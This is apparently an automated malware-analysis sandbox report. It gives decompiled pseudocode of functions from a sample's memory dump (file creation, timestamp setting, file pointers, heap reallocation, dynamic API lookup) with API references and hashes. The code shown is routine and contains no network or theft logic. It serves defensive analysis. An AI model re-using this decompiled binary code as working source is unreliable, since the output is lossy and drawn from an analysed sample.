                                                                                                                                                    0x0123b02b
                                                                                                                                                    0x0123b031
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b033
                                                                                                                                                    0x0123b037
                                                                                                                                                    0x0123b044
                                                                                                                                                    0x0123b046
                                                                                                                                                    0x0123b04a
                                                                                                                                                    0x0123b04c
                                                                                                                                                    0x0123b07c
                                                                                                                                                    0x0123b07c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b04e
                                                                                                                                                    0x0123b05b
                                                                                                                                                    0x0123b061
                                                                                                                                                    0x0123b064
                                                                                                                                                    0x0123b069
                                                                                                                                                    0x0123b06d
                                                                                                                                                    0x0123b06f
                                                                                                                                                    0x0123b08e
                                                                                                                                                    0x0123b092
                                                                                                                                                    0x0123b094
                                                                                                                                                    0x0123b094
                                                                                                                                                    0x0123b09f
                                                                                                                                                    0x0123b0a3
                                                                                                                                                    0x0123b0a4
                                                                                                                                                    0x0123b0a6
                                                                                                                                                    0x0123b0a9
                                                                                                                                                    0x0123b0b0
                                                                                                                                                    0x0123b0b5
                                                                                                                                                    0x0123b0ba
                                                                                                                                                    0x0123b0b0
                                                                                                                                                    0x0123b0bb
                                                                                                                                                    0x0123b0c1
                                                                                                                                                    0x0123b0c6
                                                                                                                                                    0x0123b0c8
                                                                                                                                                    0x0123b0cb
                                                                                                                                                    0x0123b0ce
                                                                                                                                                    0x0123b0d5
                                                                                                                                                    0x0123b0d7
                                                                                                                                                    0x0123b0de
                                                                                                                                                    0x0123b0e3
                                                                                                                                                    0x0123b0ec
                                                                                                                                                    0x0123b0f1
                                                                                                                                                    0x0123b0f7
                                                                                                                                                    0x0123b0f9
                                                                                                                                                    0x0123b0fe
                                                                                                                                                    0x0123b0fe
                                                                                                                                                    0x0123b0f7
                                                                                                                                                    0x0123b0de
                                                                                                                                                    0x0123b07e
                                                                                                                                                    0x0123b07f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b071
                                                                                                                                                    0x0123b076
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123b076
                                                                                                                                                    0x0123b06f

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 01238E25: GetLastError.KERNEL32(?,0124FF50,01233C54,0124FF50,?,?,012336CF,?,?,0124FF50), ref: 01238E29
                                                                                                                                                      • Part of subcall function 01238E25: _free.LIBCMT ref: 01238E5C
                                                                                                                                                      • Part of subcall function 01238E25: SetLastError.KERNEL32(00000000,?,0124FF50), ref: 01238E9D
                                                                                                                                                      • Part of subcall function 01238E25: _abort.LIBCMT ref: 01238EA3
                                                                                                                                                      • Part of subcall function 0123B12E: _abort.LIBCMT ref: 0123B160
                                                                                                                                                      • Part of subcall function 0123B12E: _free.LIBCMT ref: 0123B194
                                                                                                                                                      • Part of subcall function 0123AD9B: GetOEMCP.KERNEL32(00000000,?,?,0123B024,?), ref: 0123ADC6
                                                                                                                                                    • _free.LIBCMT ref: 0123B07F
                                                                                                                                                    • _free.LIBCMT ref: 0123B0B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                    • Opcode ID: 15b196dd1da8a3dfcb84ceb2df68b7aba09819aac70546491888a67e2bf52a59
                                                                                                                                                    • Instruction ID: 831d8baf6e61cc19c633b6701af8a7123084e6d4800f0e93b8b4214a376f905f
                                                                                                                                                    • Opcode Fuzzy Hash: 15b196dd1da8a3dfcb84ceb2df68b7aba09819aac70546491888a67e2bf52a59
                                                                                                                                                    • Instruction Fuzzy Hash: 7A31E4B2910209EFDB21EFA8D445B6DF7F4EF90320F250199E9149B2A1EB729D40CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012196BE, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E012196BE(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E0122E1C0();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x18) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E0121BBA9(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E0121B5AC(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x12)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E0121FD96(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                                                                                                                                                    0x012196c3
                                                                                                                                                    0x012196c9
                                                                                                                                                    0x012196d6
                                                                                                                                                    0x012196d8
                                                                                                                                                    0x012196de
                                                                                                                                                    0x012196ec
                                                                                                                                                    0x012196ec
                                                                                                                                                    0x012196e6
                                                                                                                                                    0x012196e6
                                                                                                                                                    0x012196e6
                                                                                                                                                    0x012196f6
                                                                                                                                                    0x0121970b
                                                                                                                                                    0x01219714
                                                                                                                                                    0x0121971a
                                                                                                                                                    0x01219724
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219726
                                                                                                                                                    0x01219726
                                                                                                                                                    0x0121972a
                                                                                                                                                    0x0121972c
                                                                                                                                                    0x0121972c
                                                                                                                                                    0x01219732
                                                                                                                                                    0x01219732
                                                                                                                                                    0x01219732
                                                                                                                                                    0x01219736
                                                                                                                                                    0x01219736
                                                                                                                                                    0x01219746
                                                                                                                                                    0x0121974c
                                                                                                                                                    0x0121974c
                                                                                                                                                    0x01219753
                                                                                                                                                    0x01219781
                                                                                                                                                    0x01219781
                                                                                                                                                    0x01219793
                                                                                                                                                    0x01219798
                                                                                                                                                    0x0121979b
                                                                                                                                                    0x012197b4

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,01219E1C,?,?,01217840), ref: 01219746
                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,01219E1C,?,?,01217840), ref: 0121977B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 24ca10a3fcf1911bb6c4129667218973d0ab97d8d66dc518c9f79be08e175fb5
                                                                                                                                                    • Instruction ID: cfc6f102de0d694c4a248b73a9dbbfb1d168394543df21b12311f215925c84f0
                                                                                                                                                    • Opcode Fuzzy Hash: 24ca10a3fcf1911bb6c4129667218973d0ab97d8d66dc518c9f79be08e175fb5
                                                                                                                                                    • Instruction Fuzzy Hash: F42104B0410345AEEB34CF28D885BA777E8EF55368F004A2DF6E5821C5C2B4A889CA60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219CA2, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E01219CA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E01220B3D(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E01220B3D(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E01220B3D(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}
















                                                                                                                                                    0x01219ca2
                                                                                                                                                    0x01219ca8
                                                                                                                                                    0x01219cb1
                                                                                                                                                    0x01219cbc
                                                                                                                                                    0x01219cbc
                                                                                                                                                    0x01219cc2
                                                                                                                                                    0x01219cc8
                                                                                                                                                    0x01219ccb
                                                                                                                                                    0x01219cd8
                                                                                                                                                    0x01219cd4
                                                                                                                                                    0x01219cd4
                                                                                                                                                    0x01219cd4
                                                                                                                                                    0x01219cda
                                                                                                                                                    0x01219cdb
                                                                                                                                                    0x01219cdf
                                                                                                                                                    0x01219ce5
                                                                                                                                                    0x01219cf2
                                                                                                                                                    0x01219cf2
                                                                                                                                                    0x01219ce7
                                                                                                                                                    0x01219cec
                                                                                                                                                    0x01219cf0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219cf0
                                                                                                                                                    0x01219cf7
                                                                                                                                                    0x01219cfd
                                                                                                                                                    0x01219d07
                                                                                                                                                    0x01219d07
                                                                                                                                                    0x01219d0b
                                                                                                                                                    0x01219d12
                                                                                                                                                    0x01219d12
                                                                                                                                                    0x01219d1c
                                                                                                                                                    0x01219d25
                                                                                                                                                    0x01219d25
                                                                                                                                                    0x01219d2d
                                                                                                                                                    0x01219d36
                                                                                                                                                    0x01219d36
                                                                                                                                                    0x01219d46
                                                                                                                                                    0x01219d54
                                                                                                                                                    0x01219d64
                                                                                                                                                    0x01219d6c
                                                                                                                                                    0x01219d78

                                                                                                                                                    APIs
                                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,01217520,?,?,?,?), ref: 01219CBC
                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 01219D6C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1392018926-0
                                                                                                                                                    • Opcode ID: 24bf581fc3e50c0e7da80ca91a7a8c5f2b8c586371ba844d30ac8438ef4d9299
                                                                                                                                                    • Instruction ID: 29b0899f9e59330eb3d42efd0b9abafecd129191639d70c9eaba5efe0c13598c
                                                                                                                                                    • Opcode Fuzzy Hash: 24bf581fc3e50c0e7da80ca91a7a8c5f2b8c586371ba844d30ac8438ef4d9299
                                                                                                                                                    • Instruction Fuzzy Hash: AA210731168247ABDB15DF29D4A5EBBBFE4AF65208F44081CF9C0C7155D329EA8CC791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123A2D8, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                    			E0123A2D8(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x1270628 + _a4 * 4;
				_t27 =  *0x124d668; // 0x6c4f95b1
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x124d668; // 0x6c4f95b1
							goto L13;
						}
						 *_t20 = E01232F99(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0123A374( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x124d668; // 0x6c4f95b1
						goto L7;
					}
					_t27 =  *0x124d668; // 0x6c4f95b1
					goto L8;
				}
				L2:
				return _t33;
			}










                                                                                                                                                    0x0123a2e3
                                                                                                                                                    0x0123a2ec
                                                                                                                                                    0x0123a2f2
                                                                                                                                                    0x0123a2fc
                                                                                                                                                    0x0123a2fe
                                                                                                                                                    0x0123a302
                                                                                                                                                    0x0123a36d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a36d
                                                                                                                                                    0x0123a306
                                                                                                                                                    0x0123a30c
                                                                                                                                                    0x0123a312
                                                                                                                                                    0x0123a32e
                                                                                                                                                    0x0123a32e
                                                                                                                                                    0x0123a330
                                                                                                                                                    0x0123a332
                                                                                                                                                    0x0123a35d
                                                                                                                                                    0x0123a35f
                                                                                                                                                    0x0123a367
                                                                                                                                                    0x0123a36b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a36b
                                                                                                                                                    0x0123a33e
                                                                                                                                                    0x0123a342
                                                                                                                                                    0x0123a357
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a357
                                                                                                                                                    0x0123a34b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a314
                                                                                                                                                    0x0123a314
                                                                                                                                                    0x0123a316
                                                                                                                                                    0x0123a31e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a320
                                                                                                                                                    0x0123a326
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a328
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a328
                                                                                                                                                    0x0123a34f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123a34f
                                                                                                                                                    0x0123a308
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0123A338
                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0123A345
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2279764990-0
                                                                                                                                                    • Opcode ID: e49f0dee809a9ff7867b89df3200af5cdd7feed666b5213a67f1d8e10236912a
                                                                                                                                                    • Instruction ID: 354468b76e2f47b9dbe9c0cde97a534b038c8c87a282b3c6dd9cba66841c68b1
                                                                                                                                                    • Opcode Fuzzy Hash: e49f0dee809a9ff7867b89df3200af5cdd7feed666b5213a67f1d8e10236912a
                                                                                                                                                    • Instruction Fuzzy Hash: 9B110ABBA211269F9B31DF2CF84586A7795ABC57607160230FE99EB288D670DC01C7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219AF5, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E01219AF5(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E01219885(_t28);
						} else {
							 *0x1242260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}














                                                                                                                                                    0x01219af5
                                                                                                                                                    0x01219af7
                                                                                                                                                    0x01219afd
                                                                                                                                                    0x01219b77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219b77
                                                                                                                                                    0x01219b00
                                                                                                                                                    0x01219b05
                                                                                                                                                    0x01219b09
                                                                                                                                                    0x01219b0b
                                                                                                                                                    0x01219b45
                                                                                                                                                    0x01219b13
                                                                                                                                                    0x01219b13
                                                                                                                                                    0x01219b19
                                                                                                                                                    0x01219b1e
                                                                                                                                                    0x01219b38
                                                                                                                                                    0x01219b20
                                                                                                                                                    0x01219b29
                                                                                                                                                    0x01219b31
                                                                                                                                                    0x01219b33
                                                                                                                                                    0x01219b3d
                                                                                                                                                    0x01219b3f
                                                                                                                                                    0x01219b41
                                                                                                                                                    0x01219b41
                                                                                                                                                    0x01219b19
                                                                                                                                                    0x01219b4b
                                                                                                                                                    0x01219b5c
                                                                                                                                                    0x01219b67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219b73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219b73

                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,-00001960,?,00000800,-00001960,01219AD1,?,?,00000000,?,?,01218D43,?), ref: 01219B5C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 01219B69
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                    • Opcode ID: 104decc58af1aff09cdce7ff48e410832e735c7489f96c55638da3ce109fbdec
                                                                                                                                                    • Instruction ID: 0c3a42863571d17239dbb23f1ee035a5858c28e5bd8a732c4f8264f30dd469e2
                                                                                                                                                    • Opcode Fuzzy Hash: 104decc58af1aff09cdce7ff48e410832e735c7489f96c55638da3ce109fbdec
                                                                                                                                                    • Instruction Fuzzy Hash: DB012F35320302DB8F18CE59ACA447FB3D9BFF1625B84422DFA1783284EA70D9459720
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01219D80, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E01219D80() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E01216F3A(0x124ff50, 0x124ff50, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E01216F3A(0x124ff50, 0x124ff50, _t34 + 0x1e);
				goto L3;
			}













                                                                                                                                                    0x01219d84
                                                                                                                                                    0x01219d86
                                                                                                                                                    0x01219d91
                                                                                                                                                    0x01219da4
                                                                                                                                                    0x01219da4
                                                                                                                                                    0x01219db6
                                                                                                                                                    0x01219dbc
                                                                                                                                                    0x01219dc0
                                                                                                                                                    0x01219ddd
                                                                                                                                                    0x01219de3
                                                                                                                                                    0x01219de8
                                                                                                                                                    0x01219dea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219dcc
                                                                                                                                                    0x01219dd0
                                                                                                                                                    0x01219df9
                                                                                                                                                    0x01219ded
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219ded
                                                                                                                                                    0x01219dd8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219dd8
                                                                                                                                                    0x01219dc0
                                                                                                                                                    0x01219d97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01219df5
                                                                                                                                                    0x01219d9f
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 01219DB6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 01219DC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                    • Opcode ID: 343db5b7adefc570058ab5f41e011ddf1fcc60b4a81cb9884477c9e232e746c9
                                                                                                                                                    • Instruction ID: 68c6de6cc8700a3624d2919c2dba91ea4de7bc3123347f532cf068c0ee819d0c
                                                                                                                                                    • Opcode Fuzzy Hash: 343db5b7adefc570058ab5f41e011ddf1fcc60b4a81cb9884477c9e232e746c9
                                                                                                                                                    • Instruction Fuzzy Hash: 5801D2707202016BEF34EE2DE89876BB7D99B9521CF94453DB242C26C8CA75D88DC720
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01238486, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E01238486(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x12706e4, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E01238214();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E01236FF2(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E012387DA())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E0123835E(_t14);
					goto L6;
				}
				_t9 = E01238398(__ecx, _a8); // executed
				return _t9;
			}










                                                                                                                                                    0x01238486
                                                                                                                                                    0x01238486
                                                                                                                                                    0x0123848c
                                                                                                                                                    0x01238491
                                                                                                                                                    0x0123849f
                                                                                                                                                    0x012384a2
                                                                                                                                                    0x012384a4
                                                                                                                                                    0x012384af
                                                                                                                                                    0x012384b2
                                                                                                                                                    0x012384d9
                                                                                                                                                    0x012384e3
                                                                                                                                                    0x012384e9
                                                                                                                                                    0x012384eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384ca
                                                                                                                                                    0x012384cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384cf
                                                                                                                                                    0x012384d4
                                                                                                                                                    0x012384d5
                                                                                                                                                    0x012384d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384d7
                                                                                                                                                    0x012384c1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384c1
